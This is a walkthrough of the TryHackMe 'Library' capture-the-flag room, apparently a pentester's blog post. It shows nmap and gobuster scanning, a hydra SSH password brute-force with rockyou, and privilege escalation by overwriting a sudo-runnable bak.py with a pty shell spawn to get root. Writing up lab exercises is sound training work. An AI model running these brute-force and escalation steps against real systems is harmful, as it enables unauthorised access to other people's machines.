Hello Everyone! Today we are going to solve the TryHackMe machine Library

Firstly, connect to the THM machine using VPN and start the machine

Start with Nmap scan to find out the open ports and services running on the machine

Note: If you are running as root, you don’t need to use sudo command

nmap -Pn 10.10.36.25

Perform the advance scan to find out the service versions running on the system

nmap -sC -sV -A 10.10.36.25

Let’s check the IP-address in the browser to find the details in webpage

Start the go buster to find any directories or hidden files present in the website

gobuster dir -u http://10.10.36.25/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html

We got nothing from the go buster but in the website it is mentioned that it was posted by the user name called “meliodas”. We assume it is the username and try to brute-force the password of the SSH of the user using hydra

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.36.25 ssh

We successfully cracked the SSH password, Now try to login using SSH

ssh meliodas@10.10.36.25

We successfully logged into the meliodas user and now search for the user flag

ls

cat user.txt

We found the user flag but there is a python file called bak.py before that check the file permission for the user meliodas

sudo -l

We have root permissions to execute any python file in the system, Now open the bak.py file

cat bak.py

Check the file permissions for the bak.py file

ls -la

It has root permissions. So, delete that file and create a new python file with same name bak.py in the same directory

rm bak.py

echo ‘import pty; pty.spawn(“/bin/sh”)’ > /home/meliodas/bak.py

Put the ‘import pty; pty.spawn(“/bin/sh”)’ in the bak.py file

Now execute the bak.py file

sudo python /home/meliodas/bak.py

We got the root shell and also the root flag

This concludes the room and both flags have been captured!

Penetration Tester| WAPT | Bug Bounty Hunter